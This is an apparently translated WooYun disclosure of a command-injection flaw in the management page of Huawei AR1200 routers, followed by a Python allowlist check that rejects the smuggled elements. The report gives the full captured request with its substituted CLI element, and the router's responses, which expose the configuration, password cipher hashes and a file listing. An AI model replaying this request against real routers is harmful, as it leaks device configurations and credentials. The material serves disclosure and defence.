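Huawei AR1200 Series Routers: Arbitrary Code Execution in the Management Backend
Vulnerability Summary
Bug ID: WooYun-2015-117671
Vulnerability title: Huawei AR1200 Series Routers: Arbitrary Code Execution in the Management Backend
Vendor: Huawei Technologies Co., Ltd.
Author: 1c3z
Submitted: 2015-06-02 11:15
Disclosed: 2015-06-06 08:14
Vulnerability type: Command execution
Severity: Medium
Self-assessed Rank: 8
Status: The vendor was notified of the vulnerability but ignored it
Source: http://www.wooyun.org
Tags: Remote command execution
Disclosure status:
2015-06-02: Details sent to the vendor; awaiting vendor handling
2015-06-06: The vendor actively ignored the vulnerability; details disclosed to the public
Brief description:
My school received a batch of routers. I didn't know how to configure them, so I tested them a bit.
Detailed description:
There is this feature:
System Management > Diagnostics > Ping
Captured request:
POST http://192.168.1.119/view/main/config.cgi HTTP/1.1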
Host: 192.168.1.119
Connection: keep-alive
Content-Length: 372
Origin: http://192.168.1.119
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/41.0.2272.76 Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://192.168.1.119/view/main/default.html?Version=1.2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no

SessionID=M1iBvH1s0kak71m1qqL4YFpG7iW5dxin&MessageID=280&<rpc message-id="280" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<edit-config operation="merge">
<target>
<running/>
</target>
<error-option>stop-on-error</error-option>
<config>
<featurename istop="true" type="cli">
<quit></quit>
<ping>192.168.1.1</ping>
</featurename>
</config>
</edit-config>
</rpc>]]>]]>
Change <ping>192.168.1.1</ping>
to <display>current-configuration</display>
Response:
HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:29:11 GMT
Content-Type: text/xml
Content-Length: 1402
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close

<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
<ok/>
</rpc-reply>
[V200R005C10SPC500]
#
drop illegal-mac alarm
#
wlan ac-global carrier id other ac id 0
#
pki realm default
enrollment self-signed
#
aaa
authentication-scheme default
authorization-scheme default
accounting-scheme default
domain default
domain default_admin
local-user admin password irreversible-cipher %@%@o~ho0DSI#)c&'+VR0uq2.fN8Hp:0#&|@-6h~GlN!:z~CfN;.%@%@
local-user admin privilege level 3
local-user admin service-type telnet web http
#
firewall zone Local
priority 16
#
interface Ethernet0/0/0
#
interface Ethernet0/0/1
#
interface Ethernet0/0/2
#
interface Ethernet0/0/3
#
interface Ethernet0/0/4
#
interface Ethernet0/0/5
#
interface Ethernet0/0/6
#
interface Ethernet0/0/7
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
ip address 192.168.1.119 255.255.255.0
#
interface Cellular0/0/0
#
interface Cellular0/0/1
#
interface NULL0
#
snmp-agent local-engineid 800007DB0330D17EED3C03
#
http server enable
http secure-server enable
#
user-interface con 0
authentication-mode password
set authentication password cipher %@%@C;@(!jYWE$qrE5"Q`q>7,7x)$I7.F$3jZ'IHQjB"E^|O7x,,%@%@
user-interface vty 0 4
authentication-mode aaa
#
wlan ac
#
voice
#
diagnose
#
return
Proof of vulnerability:
<dir></dir>
HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:30:29 GMT
Content-Type: text/xml
Content-Length: 917
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close

<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
<ok/>
</rpc-reply>
Directory of flash:/
Idx Attr Size(Byte) Date Time(LMT) FileName
0 -rw- 304,700 Mar 27 2015 15:22:32 sacrule.dat
1 -rw- 3,850 Jun 02 2015 07:30:07 mon_file.txt
2 -rw- 111,630,208 Jun 11 2014 03:05:56 AR1220F-V200R005C10SPC500.cc
3 -rw- 0 Mar 27 2015 15:21:58 brdxpon_snmp_cfg.efs
4 -rw- 694 Mar 30 2015 15:25:26 vrpcfg.zip
5 -rw- 396 Mar 30 2015 15:25:26 private-data.txt
6 drw- - Jun 11 2014 12:28:36 dhcp
7 drw- - Jun 11 2014 12:28:38 security
8 -rw- 1,260 Jun 11 2014 12:29:28 rsa_host_key.efs
9 -rw- 540 Jun 11 2014 12:29:32 rsa_server_key.efs
510,484 KB total (401,132 KB free)
Remediation:
You're the experts..
Copyright notice: please credit the source when reposting
1c3z@WooYun
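The captured request carries CLI commands as child elements of <featurename type="cli">, and the responses show that element names other than <ping> are accepted from the Ping page. As an added example (not part of the original report and not the vendor's code), this Python check applies a per-page allowlist to such a body, the kind of validation a management front end or an inspecting proxy could enforce. The allowlist, the function names, the placeholder SessionID and the assumption that the body arrives exactly as captured (not percent-encoded) are all assumptions.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Constructed request body modelled on the capture in the report (SessionID is a placeholder).
RPC_TEMPLATE = (
    'SessionID=PLACEHOLDER&MessageID=280&'
    '<rpc message-id="280" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">'
    '<edit-config operation="merge"><target><running/></target><config>'
    '<featurename istop="true" type="cli"><quit></quit>{cmd}</featurename>'
    '</config></edit-config></rpc>]]>]]>'
)

def _is_ip(text):
    try:
        ipaddress.ip_address((text or "").strip())
        return True
    except ValueError:
        return False

# Hypothetical allowlist for the Ping page: element name -> argument validator.
PING_PAGE_ALLOWLIST = {"quit": lambda a: not (a or "").strip(), "ping": _is_ip}

def _local(tag):
    return tag.rsplit("}", 1)[-1]  # drop the "{namespace}" prefix ElementTree adds

def audit_cli_rpc(body, allowlist=PING_PAGE_ALLOWLIST):
    """Return a list of violations; an empty list means the body is acceptable."""
    start = body.find("<rpc")
    if start < 0:
        return ["no <rpc> element in body"]
    xml_text = body[start:].split("]]>]]>", 1)[0]  # strip the end-of-message marker
    if "<!DOCTYPE" in xml_text or "<!ENTITY" in xml_text:
        return ["DTD/entity declarations are not accepted"]
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    violations = []
    for block in root.iter():
        if _local(block.tag) != "featurename" or block.get("type") != "cli":
            continue
        for cmd in block:  # each child element is one CLI command
            name = _local(cmd.tag)
            check = allowlist.get(name)
            if check is None:
                violations.append(f"command <{name}> not allowed on this page")
            elif len(cmd) or not check(cmd.text):
                violations.append(f"bad argument for <{name}>: {cmd.text!r}")
    return violations
```

Run against the three command elements shown in the report, the check accepts the <ping> body and rejects the <display> and <dir> bodies by name.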
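Vulnerability Response
Vendor response:
Severity: No impact, ignored by vendor
Ignored at: 2015-06-06 08:14
Vendor reply: Thank you to the white hat for the attention to Huawei's security. After confirmation, this privilege is the default privilege of a logged-in user. It is not a vulnerability.
Latest status: None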
[Last edited by linda on 2015-10-28 17:25]